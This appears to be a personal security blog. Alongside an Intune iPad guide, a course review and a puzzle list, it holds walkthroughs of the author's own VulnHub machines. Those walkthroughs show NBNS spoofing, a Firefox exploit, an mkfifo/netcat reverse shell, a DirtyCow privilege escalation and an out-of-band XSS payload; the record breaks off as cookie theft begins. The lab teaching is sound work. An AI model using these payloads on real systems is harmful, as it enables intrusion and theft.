Daniel Solstad

Setup and Manage iPads in Intune

Fri, 09 Dec 2022 00:00:00 +0000

The objective: Enroll iPad in Intune to be able to fully manage it and to force configurations and automatically push apps.

This guide is created from reading multiple guides and forum posts, with also some assistance from support. And most of all, trying and failing. And since my knowledge about Apple and Intune was non-existent before this journey, it made things harder. Overall, the core of this guide is very loosely based on the following official guide: https://learn.microsoft.com/en-us/mem/intune/enrollment/apple-configurator-enroll-ios

The whole connection and interplay with Apple Business Manager, Intune and Apple Configurator can be confusing, with multiple different settings and various tokens to tie things together. Intune itself can also be perplexing due to it not being a single concrete solution, but an umbrella term of multiple different parts. There is also a problem with calling support, because if you call Microsoft, they don’t know anything about Apple and if you call Apple they don’t know anything about Intune. However, one time I called Apple support and randomly the guy on the phone had worked with Intune before and was of great help. Thank you Sven!

At first I thought enrolling iPads in Intune would be easy, by just installing Intune Company Portal on the iPads and signing in, like many guides and Youtube videos suggested. This was in fact easy, but this method provided extremely limited ability to enforce configurations. It came to my understanding that the intended way of enrolling Apple devices in an organization is to define a reseller in Apple Business Manager and buy devices through them where the devices are shipped pre-enrolled in the organization.

After some more reading I came across a tool called Apple Configurator. The tool is free, but I had to get a personal AppleID and a Macbook to run it, because it’s only available through Apple Store. With this tool you can enroll devices by connecting them via USB-C to a Macbook with this software. I first tried the Direct Enrollment method, which didn’t require a disk wipe, but this method was also not sufficient enough to enforce the configurations I wanted. It was after doing the Setup Assistant enrollment method I finally got the results that I wanted, but it did require a disk wipe.

Note that I have already enrolled one iPad, so don’t be confused when it shows two devices. New device with serial number H is the iPad which gets enrolled in this guide.

Setup and Enrollment

Follow these steps consecutively and keep in mind that there will be a lot of back-and-forth between the different tools. Also keep in mind that you will be logged out of Apple Business Manager after a very short time idling, so I recommend refreshing the page from time to time.

1. Apple Business Manager - Enrolling

Before anything else, enroll your organization in Apple Business Manager. This is completely free and can be done by clicking ‘enroll now’ on business.apple.com. The form needs something called a DUNS number. What this is, how to request it, and how to look it up can be found here: developer.apple.com/support/D-U-N-S/ You can also expedite this whole process by calling Apple Support, but should not be needed.

2. Intune - MDM Push Certificate

For Intune to be able to manage Apple devices, a MDM push certificate, signed by Apple, needs to be uploaded to Intune.

This procedure is straightforward by just following the steps shown when clicking on ‘Apple MDM Push certificate’. Download the signing request file from Intune, which you then upload to Apple to get a certificate back to upload to Intune.

3. Intune - Enrollment Program Token

There are two options under Bulk enrollment methods, and we will only be using Enrollment program tokens for this guide, even though we will be using Apple Configurator, as intuitively that may sound.

First we need to create a token to establish trust with Intune and Apple Business Manager. Under Enrollment program tokens, click on Add. You will see the following screen.

Grant permission, download the public key and insert your Apple ID. Keep this window open while we get the Apple token from ABM.

4. Apple Business Manager - Setting up MDM

In ABM, click on your username bottom left and go to Preferences. Here, add a new MDM Server. Call it e.g. Intune. Upload the public key downloaded from Intune in the previous step and download the token from ABM. Go back to Intune and upload the Apple token to finish the token creation process.

While in ABM, we can set up automatic MDM assignments. Under Preferences > MDM Server Assignment, it’s possible to automatically enroll devices into different MDMs. In this example I have set up so that all iPads will be assigned to Intune. However, I don’t think I have gotten this automatic assignment to work, because it’s needed to manually assign the iPads later.

5. Intune - Enrollment Profile

Under Enrollment Program Tokens, click on the token created earlier. Under Profiles, create a new profile with the following settings.

We will go back here and assign the profile to the device after we have prepared the device with Apple Configurator.

6. Apple Configurator - Prepare

Before setting enrolling devices, make sure you have an Apple ID associated with the organization. This can be created in Apple Business Manager.

This application is used to directly enroll Apple devices to the organization via USB-C. It is only available for MacOS and can be downloaded from the Apple Store.

Inside Apple Configurator, click the top left corner and choose Preferences. Add organization and choose ‘Generate a new supervision identity’. Then go to the Servers tab and create a dummy entry. Call it ‘test’ and leave the URL as default.

The device cannot be prepared without a Wi-Fi profile. On the top menu, click on Actions > Profile. Find Wi-Fi and enter the details for the relevant Wi-Fi access point that the device will use.

Connect an Apple device and click on prepare. Make sure to select Manual Configuration and deselect ‘Activate and complete enrollment’.

When asked for a network profile, locate the Wi-Fi profile created earlier.

The device will now be formatted and enrolled to Apple Business Manager.

An excellent video of these steps can be found here: https://www.youtube.com/watch?v=x05S3pbkrSw

7. iPad - Setup

On the iPad, go through the normal steps of setup until it shows the external management screen. Continue to step 8 and come back to the iPad when the iPad screen shows your organization name, after assigning the profile to the device in Intune.

8. Apple Business Manager - Verify

Under Preferences, you will see the new device under the Apple Configurator MDM Server. This means we have enrolled the device in Apple Business Manager. However, it is not yet connected to Intune.

9. Apple Business Manager - Change MDM

Find the new device and click on Edit MDM Server, choose Intune.

Now you will see that the device is moved to Intune, as such:

10. Intune - Assign Profile

In Intune, you will soon see the new device under Enrollment program tokens > Intune > Devices. Select it and click on ‘Assign Profile’ and select the profile created earlier.

11. Apple Configurator - Prepare again

If the iPad is not being enrolled at this stage, you need to prepare the device again, like in step 6. If you do this, then you also need to assign the device again to Intune in ABM, as in step 9.

12. Intune - Verify

If everything went well, you should now see the device in Intune. Make sure it has a profile assigned and that on ‘Removed from ABM’ says ‘No’. If it doesn’t have a profile assigned, go back to step 9.

Groups

Intune - Create Group and Assign Device

The easiest way to manage devices is to associate them with a group, which then devices are added to.

In Intune, go to Groups and click ‘New group’. Set type to ‘Security’ and choose a name. Keep everything else default.

After the group is created, open the group and select Members. Click on ‘Add members’ and find the relevant device and add it.

Apps

To be able to push apps to devices, we first need to download a token from ABM, upload it to Intune. Then we need to get licenses for apps in ABM, which will then show up in Intune. From there the app can be assigned to the relevant groups.

Apple Business Manager - VPP Token

Download the server token from Payments and Billing, which we will upload to Intune in the next step.

Intune - VPP Token

From Tenant Administration from the left side menu, click on Connectors and Tokens and go to Apple VPP Tokens. Click on Create, choose a name, enter your Apple ID and upload the VPP token downloaded from ABM in the previous step. The next steps should be straightforward.

After it is created, notice the three dots on the far right side. Click on Sync.

Apple Business Manager - Purchase Apps

After the enrollment, there should be no Apple users signed into the iPad. And even if you created an Apple ID from Apple Business Manager and signed it into the device, installation from the App Store would be unavailable. Apps need to be purchased from Apple Business Manager via the Volume Purchase Program (VPP) and custom apps can be added in Intune.

In ABM, click on Apps and Books. Search for the app you want, choose quantity and assign it to your organization.

Intune - Apps

If everything is configured correctly, the app should be visible under All Apps in Intune, with type ‘iOS volume purchase program app’.

Click on the apps and go to Properties. Scroll down and assign the app to the relevant group.

Now, the app should be pushed to the device.

Forced Configurations

Intune - Chose Rules

From Intune, it’s possible to force configurations to the devices. And since the device is fully supervised, a wide range of possible configurations are available. In Intune, create a new Config Policy. Browse and choose the different desired configurations and assign the policy to the relevant groups.

Here you can also setup rules to hide native built-in Apple apps, chose the layout of the home screen etc.

Offensive Security AWAE/OSWE Review

Thu, 15 Apr 2021 00:00:00 +0000

I started the AWAE course before the 2020 update and bought the upgrade after my first exam attempt, which really improved the course, in regards to more modules, techniques and the introduction to a lab. Thus, I will focus this review on the post-update course.

I want to start this by saying that the course was extremely good and I learned a ton, and I would recommend it to every pentester and bug bounty hunter out there, and even developers. The course takes you through real world zero day exploits in open source software, where they show how to chain small security issues into full unauthenticated RCE exploits to get a shell. However, the most fun part of the course is the lab with three computers for you to have a go at by yourself, like in the PWK labs.

Complaints

The biggest complaint I have heard for this course is that the main focus is whitebox testing, even after the upgrade where they added one blackbox module. This is true, but I personally don’t find the whitebox focus to be a bad thing. The course will teach you what is going on at the backend and what mistakes there might be, which will give you ammunition when performing a blackbox assessment. Also, I think more pentesters should start asking for the source code when performing real world security assessments, to make the assessment more efficient and thorough.

The second complaint I have heard is that you will need to read a lot of source code and that the course doesn’t really go deep into teaching you how to efficiently look for vulnerabilities. I also had this impression after my first exam attempt, which I will talk about next, but overall I think the course teach you enough to pass the exam, but of course it will also depend on your prior skillset.

My only wish is that the course would cover even more advanced techniques, and especially client-side attacks.

Exam

There is no secret that the exam exist of two machines, where you will need to find a way to bypass authentication and then find a way to execute code to get a shell. On my first exam attempt I took down one of the machines after a couple of hours, and then used the remaining time on the other machine without getting any results. After this, I was irritated and felt that the machine was unfairly difficult. When I looked back at the course PDF, I saw that it would have helped me if I did all the extra mile assessments, because I only did the ones I thought were relevant and fun.

On my next exam, I got different machines and I got enough points to pass within the first day, and finished the last objective the morning after. I really enjoyed the exam and felt that they were on the perfect level of difficulty. They were indeed hard, but still doable, and also a lot of fun and realistic. Only the first couple of hours were stressful, because you have no clue what to do, but after a while you start to understand and it gets enjoyable. The next day I spent many hours on writing a huge professional report, which was probably overkill, but I’m one of those weird persons that enjoy writing nice reports.

Tips

The exam requires you to write the whole attack chain for each machine in one script that automates the whole process, so make sure you are very comfortable in at least one language.
Do all the extra mile assessments in the course.
Try to find all the ways to exploit the machines in the course lab and write a full PoC script for them.
If you fail your first exam attempt, don’t give up. Have another go.
Try to enjoy the course and the journey.

A collection of my favorite logical puzzles

Thu, 01 Oct 2020 00:00:00 +0000

I have heard a lot of logical puzzles over the years, and I have now compiled a list of my favorite ones. None of these puzzles have dumb answers, nor do they require a PhD in mathematics to solve. Most of them are probably well known, but I have rewritten them in my own words. If anyone has any input to more cool puzzle, then reach out!

Blue Eyes

xkcd.com’s Blue Eyes puzzle is hard, mind-bending and beautiful. I have written an article about this puzzle before, where I presented my version of the puzzle text, my explanation of the official solution and my alternative solution. Check it out [here](https://dsolstad.com/puzzle/2017/02/24/Riddles-in-the-Dark-Blue-Eyes.html.

The King and his Servants

A king has 100 servants and wants to find out how smart they are. He says to them that they will be getting a hat that is randomly either red or blue placed on their head. They will then be standing in a line, facing the back of the head to the one in front of them. Starting from the servant in the back, the king will ask them which color they have on their hat. If they answer wrong, the servant would be shot. The amount of red and blue hats are random, and they cannot see their own hat color, but they can see every hat in front of them. They can also hear what the person behind them answered. They cannot communicate while standing there, other than answering “red” or “blue”, but they can come up with a strategy beforehand to make as many survive as possible. How can they guarantee that 99 servants has 100% chance of surviving?

Solution

This video shows a good explanation of the solution: https://www.youtube.com/watch?v=3-avaCx4Czk

Three Guys at the Hotel

Three men goes to the reception of a hotel to get a room. The clerk says it costs $30 and each men gives the clerk $10. The men goes up to the room, but now the clerk remembers that the room is for sale right now and costs only $25. He then sends $5 with the bellboy up to the room to give to the men. The bellboy thinks that he can’t divide $5 on three men, so he keeps $2 for himself and give the men $1 each.

So to sum this up: Each men has payed $9 each, because they got $1 back. That is $27. The bellboy has $2, which brings the total at $29. Where is the last $1?

Solution

This puzzle is a bit mind bending and confusing. I remember hearing it from my high school teacher, where he said that the answer was just the way numbers work. However, that is not the case at all. The trick on this puzzle is how the last statement is framed. Saying that the bellboy has $2 is not correct, because the men has already payed for those. What should be correct is to say that 3 x $27 - $2 = $25.

A blind man has 4 pills in his pocket. 2 red and 2 blue. He must swallow 1 red and 1 blue pill to survive. If he swallows two of the same color, he dies. He is alone. No one can help him. The pills has the same texture and smell. Time isn’t really an issue, but let’s say he has 2 minutes to swallow the correct pills before he dies. How can he guarantee that he survives?

Solution

He picks up one pill at the time and breaks them in two. He then separates the two halves in different piles and consumes one pile. Since each pile contains 1/2 Red + 1/2 Red + 1/2 Blue + 1/2 Blue = 1 Red + 1 Blue, he survives.

The Mountain Climber

A mountain climber is on top of a mountain which is 200 meters tall. 100 meters below him is a platform he can stand on. Both the top of the mountain and the platform has a hook he can tie a rope to. The climber has a knife and a rope that is 150 meters long. How can he get all the way down? Note that he cannot jump several meters down and the rope needed to tie knots is too insignificant to matter.

Solution

He cuts the rope so that he has one that is 100 meters and one of 50 meters. He then ties the 50 meter rope to the top hook and creates a loop of the 100 rope, which he ties the 50 meter rope to. The length of this joint rope is now 100 meters and he can get down to the platform. He can now untie or cut the 100 meter rope loop and drag in it until it comes off the 50 meter rope. He can now get to the bottom by tying the 100 meter rope to the hook at the platform and get safe down. ![Climber solution](/images/climber_sol.png)

Variable Swapping

This is more of a programming puzzle, but doesn’t really require much programming skills. The task is simple: Two variables (a and b) can have any single value, be it a digit or a character. Swap the values of these variables without using any existing functions, arrays or creating new variables. Also, a,b=b,a is not allowed, as you can do in Python. I have verified that it works in C/C++, PHP and Perl, so think in C-style languages.

a = 'a';
b = 'b';

Solution

An example code can be found here. The ^ sign is the XOR operator, which will convert the character to binary in C-based languages. However, with digits instead of characters it will probably work in any language and you can use basic addition and subtraction as well.

The Brothers

You are on the way to the beautiful city Oslo and are at a crossroads, where the road splits in two. You don’t know the way. However, there are two brothers living next to the road who knows. One of them always tells the truth and the other one always lies. You don’t know who is who and you can ask one of them only one question. What can you ask to get in the right direction to Oslo?

Solution

You can simply ask one of them "What would your brother say was the way to Oslo?" and then go the other way of what was answered. If you asked the brother who always told the truth, then he would say the answer that the lying brother would give, which would be the wrong way. If you would ask the lying brother, he would lie about the correct answer the honest brother would give, and then give you the wrong path.

Squares

Imagine that the following lines are matchsticks. The task it to move two of them to form 4 equally big fully squares, with no spare parts and no partial squares.

Solution

The solution is actually very simple, but people usually spend way to much time solving it. ![Squares solution](/images/squares_sol.png)

5+5+5=550

Make the equation 5+5+5=550 valid by drawing one straight line anywhere. Note that it is not allowed to draw a line over the equal sign.

Solution

545+5=550

The Man and the Window

A man has a house and on the wall there is a square windows that is 1 meter tall and 1 meter wide. However, he wants to double the size of the window to get more light in, but still want it to be 1 meter tall and one meter wide. How can he achieve this? Note that the window must be square and flat just like a traditional window.

Solution

This is probably the weakest puzzle on the list, with a bit of an unsatisfying answer, but I still find it amusing. ![Squares solution](/images/window_sol.png)

Walkthrough of Leopold

Wed, 30 Sep 2020 00:00:00 +0000

Intro

Leopold was the second machine I created for my SP series in late 2018, and I think it’s the most popular of my machines. There are many walkthroughs out there for Leopold, but I wanted to show how I intended to solve it, but I have also made the walkthrough from an objective standpoint. Leopold is very different from any other VM that I have seen on VulnHub due to it’s client-side aspect and will teach a real-world attack vector commonly used in penetration tests. Lastly, I would personally view this VM as easy in difficulty, but I have seen people complain about this. However, I think this is due to the unfamiliarity with this kind of exploitation.

Enumeration

After finding the server on the network, we do a port scan to determine the services running:

$ nmap -sTV 192.168.0.31 -n -p-
---
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
---

The smb service doesn’t yield anything useful, other than that it’s a Linux machine, due to the Samba implementation of SMB. Where do we go from here? Let’s fire up Wireshark to see if we can learn anything from there.

After some minutes we can see that there is a NBNS request for DISNEYWORLD made from leopold:

192.168.0.31 192.168.0.255 NBNS 92 Name query NB DISNEYWORLD<00>

Setting up Man-in-the-middle

Netbios Name Service (NBNS) is like DNS, but simpler and decentralized. Instead of asking a server for hostname resolution, it sends out a broadcast asking the whole network if they know which IP-address a hostname resolves to. It is usually used together with LLMNR and mDNS as backup if a DNS request would fail. These protocols trusts the answers blindly, which makes them optimal for poisoning attacks to reroute the communication through our attacking machine.

There are multiple tools we can use for this, but we will stick to a Metasploit module which was made exactly for this.

Open Metasploit and use the auxiliary/spoof/nbns/nbns_response module. Set REGXP to “disneyworld” and SPOOFIP to your own attacking IP address. Keep Wireshark before writing “run” and hitting enter to start the module.

msf5 auxiliary(spoof/nbns/nbns_response) > options 

Module options (auxiliary/spoof/nbns/nbns_response):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   REGEX      disneyworld      yes       Regex applied to the NB Name to determine if spoofed reply is sent
   SPOOFIP    192.168.0.32     yes       IP address with which to poison responses
   TIMEOUT    500              yes       The number of seconds to wait for new data


Auxiliary action:

   Name     Description
   ----     -----------
   Service  Run NBNS spoofing service


msf5 auxiliary(spoof/nbns/nbns_response) > run
[*] Auxiliary module running as background job 0.

[*] NBNS Spoofer started. Listening for NBNS requests with REGEX "disneyworld" ...
msf5 auxiliary(spoof/nbns/nbns_response) > 

Soon we will see the following output in Metasploit, meaning that leopold now thinks that the DISNEYWORLD hostname is resolving to our attacking computer.

[+] 192.168.0.31     nbns - DISNEYWORLD matches regex, responding with 192.168.0.32

We will also soon after see some TCP requests to port 80 from leopold to our attacking machine in Wireshark. However, we don’t have anything running on port 80. We can fire up a netcat listener to see the request.

root@kali:~# nc -nlvp 80
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 192.168.0.31.
Ncat: Connection from 192.168.0.31:51910.
GET / HTTP/1.1
Host: disneyworld
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Here we have the request leopold is making. There is two key pieces of information we can gather from this, namely the user-agent string and the endpoint he is trying to reach, which is the root directory. After a quick web search on the user-agent string, we learn that leopold is using Firefox 16.

Initial Access

Searching for “firefox” in searchsploit gives many possible alternatives and after some research, the “toString console.time Privileged JavaScript Injection” exploit seems to be a match for the Firefox version in question and there is even a Metasploit module for it. The module sets up a webserver on the attacking machine to serve the browser exploit to visitors. Let’s change the SRVPORT to 80, which was the port leopold was trying to reach, and URIPATH to “/”, before running it.

msf5 exploit(multi/browser/firefox_tostring_console_injection) > options 

Module options (exploit/multi/browser/firefox_tostring_console_injection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CONTENT                   no        Content to display inside the HTML <body>.
   Retries  true             no        Allow the browser to retry the module
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.32     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal (Javascript XPCOM Shell)


msf5 exploit(multi/browser/firefox_tostring_console_injection) > 

After some minutes we get a shell:

[*] 192.168.0.31     firefox_tostring_console_injection - Sending HTML response to 192.168.0.31
[-] 192.168.0.31     firefox_tostring_console_injection - Target 192.168.0.31 has requested an unknown path: /favicon.ico
[-] 192.168.0.31     firefox_tostring_console_injection - Target 192.168.0.31 has requested an unknown path: /favicon.ico
[*] Command shell session 1 opened (192.168.0.32:4444 -> 192.168.0.31:36555) at 2020-09-15 17:15:05 -0400
msf5 exploit(multi/browser/firefox_tostring_console_injection) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(leopold) gid=1000(leopold) groups=1000(leopold),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare)

The shell is not stable and dies after some mintues. To fix this, we can create a new shell. Open a new netcat listener on port 3333 on the attacking machine and write the code below in the current shell. Remember to change the attacking IP address.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.32 3333 >/tmp/f

Priv Esc

Due to the old Linux kernel version, we can try the goto DirtyCow exploit. Simply download, rename and host the source code on the attacking machine:

root@kali:~# wget https://www.exploit-db.com/download/40839
root@kali:~# mv 40839 40839.c
root@kali:~# python3 -m http.server 8080

Download, compile and run the exploit on the target host, from the remote leopold shell:

$ wget http://192.168.0.32
$ gcc 40839.c -o cow -pthread -lcrypt
$ ./cow

Enter a password for the firefart root user and wait for the exploit to finish, before switching to the firefart user:

$ su firefart
$ id
$ uid=0(firefart) gid=0(root) groups=0(root)

Summary

Leopold is a workstation and a user trying to browse the Internet. What is most likely a typo in the address bar of the web browser, results in DNS failing and the computer resorts to alternative name resolution systems, which are open for man-in-the-middle attacks. From here we poisoned the name resolution request and redirected Leopold’s traffic to our attacking computer which served a browser exploit, gaining us remote access to Leopold’s computer. Using a well known kernel exploit, we managed to gain administrative rights to his computer.

This attack vector is being actively used in real world penetration tests, with tools such as Responder, that works with a lot of different protocols and sets up various fake services, such as SMB to steal domain credentials and hashes.

Walkthrough of Alphonse

Wed, 30 Sep 2020 00:00:00 +0000

Intro

The following is a walkthrough for one of the machines I have created and submitted to VulnHub for my SP series. Since I created the VM, I’m biased on how to solve it, but I have tried to tackle it from an objective point of view. Before we go on, a fun thing to know about this VM is that it was inspired from a real penetration test and the reason mygg.js was built. Personally, I regard the difficulty level as intermediate.

Prep

Let’s add alphonse to /etc/hosts to make things more trivial.

root@kali:~# cat /etc/hosts         
0.0.1       localhost
0.1.1       kali
168.0.36    alphonse

Enumeration

nmap

A port scan gives us a lot to go after, with multiple interesting services. We can already see some files on the FTP server with anonymous login enabled and a webserver, which we should do some content discovery on. We should also see if we can gather some information from the smb service.

root@kali:~# nmap -sTVC alphonse -p- -n
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-16 15:58 EDT
Nmap scan report for 192.168.0.36
Host is up (0.00054s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x    2 ftp      ftp          4096 Sep 05  2019 dev
|_drwxr-xr-x    2 ftp      ftp          4096 Aug 30  2019 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.34
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp  open  http        Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 403 Forbidden
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:AC:1F:1D (Oracle VirtualBox virtual NIC)
Service Info: Hosts: 127.0.1.1, ALPHONSE; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.82 seconds
root@kali:~# 

enum4linux

enum4linux doesn’t give us that much information, other than some default shares.

root@kali:~# enum4linux alphonse
---
//192.168.0.36/print$   Mapping: DENIED, Listing: N/A
//192.168.0.36/IPC$ [E] Can't understand response:
---

Web server

We can use my new favorite content discovery tool ffuf to enumerate content on the webserver. Unfortunately, it doesn’t find anything useful with the basic big.txt in Kali.

root@kali:~/go/bin# ffuf -w /usr/share/wordlists/dirb/big.txt -u http://alphonse/FUZZ
.htaccess               [Status: 403, Size: 296, Words: 22, Lines: 12]
.htpasswd               [Status: 403, Size: 296, Words: 22, Lines: 12]
server-status           [Status: 403, Size: 300, Words: 22, Lines: 12]
:: Progress: [20469/20469] :: Job [1/1] :: 4093 req/sec :: Duration: [0:00:05] :: Errors: 0 ::
root@kali:~/go/bin# 

FTP

We can use the build-in ftp tool to browse and download the DNAnalyzer.apk file. Interesting.

root@kali:~# ftp alphonse
Connected to 192.168.0.36.
220 (vsFTPd 3.0.3)
Name (192.168.0.36:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 ftp      ftp          4096 Sep 05  2019 dev
drwxr-xr-x    2 ftp      ftp          4096 Aug 30  2019 pub
226 Directory send OK.
ftp> cd dev
250 Directory successfully changed.
ftp> get DNAnalyzer.apk
local: DNAnalyzer.apk remote: DNAnalyzer.apk
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for DNAnalyzer.apk (2009772 bytes).
226 Transfer complete.
2009772 bytes received in 0.05 secs (40.5301 MB/s)
ftp> 

Disecting the APK

APKs are Android packages containing Java code, which we can reverse engineer and take a investigate the source code.

Since APK is basically just a zip file, we can extract it like a zip file:

root@kali:~# unzip DNAnalyzer.apk -d dnanalyzer
root@kali:~# cd dnanalyzer

We need to convert the dex format to Java, using dex2jar.

root@kali:~/dnanalyzer# apt install dex2jar
root@kali:~/dnanalyzer# d2j-dex2jar classes.dex
root@kali:~/dnanalyzer# ls
AndroidManifest.xml  classes.dex  classes-dex2jar.jar  META-INF  okhttp3  res  resources.arsc

We now have a jar file, which we can open with jd-gui. Inside com/dnanalyzer.jwt/network/NetworkRequest.class we can find some interesting file paths and functionality.

public void doGetProtectedQuote(@NonNull String paramString, @Nullable Callback paramCallback) {
setCallback(paramCallback);
doGetRequestWithToken("http://alphonse/dnanalyzer/api/protected/result.php", new HashMap(), paramString, paramCallback);
}

public void doLogin(@NonNull String paramString1, @NonNull String paramString2, Callback paramCallback) {
setCallback(paramCallback);
HashMap hashMap = new HashMap();
hashMap.put("username", paramString1);
hashMap.put("password", paramString2);
doPostRequest("http://alphonse/dnanalyzer/api/login.php", hashMap, paramCallback);
}

public void doSignUp(@NonNull String paramString1, @NonNull String paramString2, String paramString3, @Nullable Callback paramCallback) {
setCallback(paramCallback);
HashMap hashMap = new HashMap();
hashMap.put("username", paramString1);
hashMap.put("password", paramString2);
hashMap.put("dna_string", paramString3);
doPostRequest("http://alphonse/dnanalyzer/api/register.php", hashMap, paramCallback);
}

Understanding the API

The register.php file do exist as proven by doing a request to it. It complains about some missing arguments. We also learn that the API use JSON for information exchange, which will be important when we will be constructing requests.

root@kali:~# curl http://alphonse/dnanalyzer/api/register.php
<br />
<b>Notice</b>:  Undefined index: username in <b>/var/www/html/dnanalyzer/api/register.php</b> on line <b>22</b><br />
<br />
<b>Notice</b>:  Undefined index: password in <b>/var/www/html/dnanalyzer/api/register.php</b> on line <b>23</b><br />
<br />
<b>Notice</b>:  Undefined index: dna_string in <b>/var/www/html/dnanalyzer/api/register.php</b> on line <b>24</b><br />
{"message":"User was successfully registered."}root@kali:~# 

Let’s try an make a test user:

root@kali:~# curl -i -d "username=test&password=test&dna_string=test" http://alphonse/dnanalyzer/api/register.php
HTTP/1.1 200 OK
Date: Wed, 16 Sep 2020 20:42:03 GMT
Server: Apache/2.4.38 (Debian)
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Content-Length: 47
Content-Type: application/json; charset=UTF-8

{"message":"User was successfully registered."}
root@kali:~# 

And now logging in with it:

root@kali:~# curl -i -d "username=test&password=test" http://alphonse/dnanalyzer/api/login.php
HTTP/1.1 200 OK
Date: Wed, 16 Sep 2020 20:42:55 GMT
Server: Apache/2.4.38 (Debian)
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Content-Length: 333
Content-Type: application/json; charset=UTF-8

{"message":"Successful login.","jwt":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJBbHBob25zZSIsImF1ZCI6IlRIRV9BVURJRU5DRSIsImlhdCI6MTYwMDI4ODk3NSwibmJmIjoxNjAwMjg4OTg1LCJleHAiOjE2MDAyODkwMzUsImRhdGEiOnsiaWQiOiI0MyIsInVzZXJuYW1lIjoidGVzdDMifX0.WQYhW4hdCDG4qL3cHUsaEjzYyH5rralCzcgiu52nF-w","username":"test","expireAt":1600289035}
root@kali:~# 

Looks like it’s working, and we are given a JWT token. What can we do from here? Let’s go back to do some more enumeration of the newly discovered web directory.

root@kali:~# ffuf -w /usr/share/wordlists/dirb/big.txt -u http://alphonse/dnanalyzer/FUZZ
.htaccess               [Status: 403, Size: 307, Words: 22, Lines: 12]
.htpasswd               [Status: 403, Size: 307, Words: 22, Lines: 12]
api                     [Status: 301, Size: 321, Words: 20, Lines: 10]
portal                  [Status: 301, Size: 324, Words: 20, Lines: 10]
vendor                  [Status: 301, Size: 324, Words: 20, Lines: 10]
:: Progress: [20469/20469] :: Job [1/1] :: 2046 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
root@kali:~# 

The portal folder looks interesting, which provides a html page with a login form. However, providing our newly created user didn’t get us inside. Maybe this is an admin portal?

root@kali:~# curl http://alphonse/dnanalyzer/portal/
<form action="" method="POST"><input name="user" type="text" placeholder="username" /></br><input name="pass" type="password" placeholder="password" /></br><input name="login" type="submit" value="Login" /></form>
root@kali:~# 

Out-of-bound XSS

If this is an admin portal and an administrator is viewing user information, maybe we can trigger an XSS. Since we are very much blind here, we will send a simple out-of-bounds payload, loading an image from our attacking machine (192.168.0.34). Be sure to open a listener on the attacking machine first.

nc -nlvp 80

root@kali:~# curl -i -d "username=test2&password=test2&dna_string=<img src='http://192.168.0.34/x'>" http://192.168.0.36/dnanalyzer/api/register.php
HTTP/1.1 200 OK
Date: Wed, 16 Sep 2020 21:36:13 GMT
Server: Apache/2.4.38 (Debian)
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Content-Type, Access-Control-Allow-Headers, Authorization, X-Requested-With
Content-Length: 47
Content-Type: application/json; charset=UTF-8

{"message":"User was successfully registered."}

After some minutes we can see a request made to our machine:

root@kali:~# nc -nlvp 80
GET /x HTTP/1.1
Host: 192.168.0.34
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dnanalyzer/portal/index.php
Connection: keep-alive

Also, here we learn about the portal page. Now, let’s try to check if there are any cookies by sending document.cookie back to our server.

